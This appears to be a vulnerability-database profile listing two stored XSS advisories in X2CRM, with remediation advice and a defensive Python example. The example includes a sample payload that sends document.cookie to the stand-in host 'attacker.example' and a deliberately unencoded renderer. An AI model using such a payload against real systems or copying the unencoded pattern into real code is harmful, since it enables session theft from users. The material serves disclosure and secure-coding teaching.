
Hades484

Rank: #21806 of 53,630 · Total CVSS: 10.9 · Vulnerabilities: 2 (Medium: 2)
PT-2021-10586 · CVSS 4.8 · 2021-04-14
X2Engine · X2Crm · CVE-2020-21088
**Name of the Vulnerable Software and Affected Versions** X2Engine X2CRM versions prior to 7.1 **Description** Cross-Site Scripting (XSS). A remote attacker who can submit a contact can inject arbitrary web script or HTML through the `First Name` and `Last Name` fields of the "/index.php/contacts/create" page; because the values are stored and later rendered without encoding, the script runs in the browser of any user who views the contact and can disclose sensitive information (for example session data) to the attacker. **Recommendations** Update to version 7.1 or later, where the issue is fixed. As a temporary workaround, restrict the characters accepted in the `First Name` and `Last Name` fields (reject HTML markup) to reduce the risk of script injection; this is a mitigation, not a substitute for encoding the values when they are rendered.
PT-2021-17384 · CVSS 6.1 · 2021-04-14
X2Engine · X2Crm · CVE-2021-27288
**Name of the Vulnerable Software and Affected Versions** X2Engine X2CRM version 7.1 **Description** Cross-Site Scripting (XSS). A remote attacker can inject arbitrary web script or HTML through the `Comment` field of the "/profile/activity" API endpoint; the comment is rendered to other users without encoding, so the injected script executes in their browsers and can disclose sensitive data. **Recommendations** Update to a version that includes a fix for this issue (note that 7.1, which fixed CVE-2020-21088, is itself affected here). Until then, restrict access to the "/profile/activity" page to trusted users and avoid using the `Comment` field on the affected page.
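Both entries describe the same defect class: user-controlled text (`First Name`/`Last Name` in the first, `Comment` in the second) is written into HTML without encoding. The following is an added example, not code from X2CRM or from the researcher; it uses a hypothetical renderer to show the vulnerable pattern beside the hardened one (HTML-encode at the output point, including attribute contexts), plus the kind of input restriction the recommendations mention as an interim workaround. The field names, the sample payload and the `attacker.example` host are constructed for illustration.

```python
import html
import re

# Constructed sample payload of the kind an attacker would submit in a
# First Name / Last Name or Comment field. Not taken from the advisory.
PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'


def render_vulnerable(first_name: str, last_name: str, comment: str) -> str:
    """Hypothetical vulnerable renderer (illustrates the bug, not X2CRM code).

    The stored values are concatenated straight into the page, so a payload
    saved once executes in the browser of every user who views the record.
    """
    return (
        f'<div class="contact" data-name="{first_name} {last_name}">'
        f"<h2>{first_name} {last_name}</h2>"
        f'<p class="comment">{comment}</p></div>'
    )


def render_safe(first_name: str, last_name: str, comment: str) -> str:
    """Hardened renderer: every user-controlled value is HTML-encoded where it
    is written. quote=True also encodes ' and ", which matters for the
    data-name attribute; encoding only < and > would leave attribute breakout.
    """
    def e(s: str) -> str:
        return html.escape(s, quote=True)

    return (
        f'<div class="contact" data-name="{e(first_name)} {e(last_name)}">'
        f"<h2>{e(first_name)} {e(last_name)}</h2>"
        f'<p class="comment">{e(comment)}</p></div>'
    )


# Interim input restriction for name fields (the workaround the advisory
# suggests). Rejects the characters needed to open a tag or break out of an
# attribute while still accepting ordinary names such as O'Brien. This is a
# mitigation only: output encoding is still required, and this rule should
# not be applied to free-text fields like Comment.
_NAME_RE = re.compile(r"^[^<>&\"]{1,64}$")


def name_is_acceptable(value: str) -> bool:
    return bool(_NAME_RE.fullmatch(value))


def payload_neutralized(rendered: str) -> bool:
    """True if no raw <script> tag survives in the rendered HTML."""
    return "<script" not in rendered.lower()


if __name__ == "__main__":
    bad = render_vulnerable("Alice", PAYLOAD, "hello")
    good = render_safe("Alice", PAYLOAD, "hello")
    print("vulnerable renderer neutralized payload:", payload_neutralized(bad))
    print("hardened renderer neutralized payload:  ", payload_neutralized(good))
    print("name filter accepts O'Brien:", name_is_acceptable("O'Brien"))
    print("name filter accepts payload:", name_is_acceptable(PAYLOAD))
```

The check that matters for triage is the last one in `render_safe`: encoding must cover every context the value lands in (element text and attributes here). A filter on the input side, as in `name_is_acceptable`, only narrows the attack surface for the specific fields it is applied to and does nothing for the `Comment` field in the second entry.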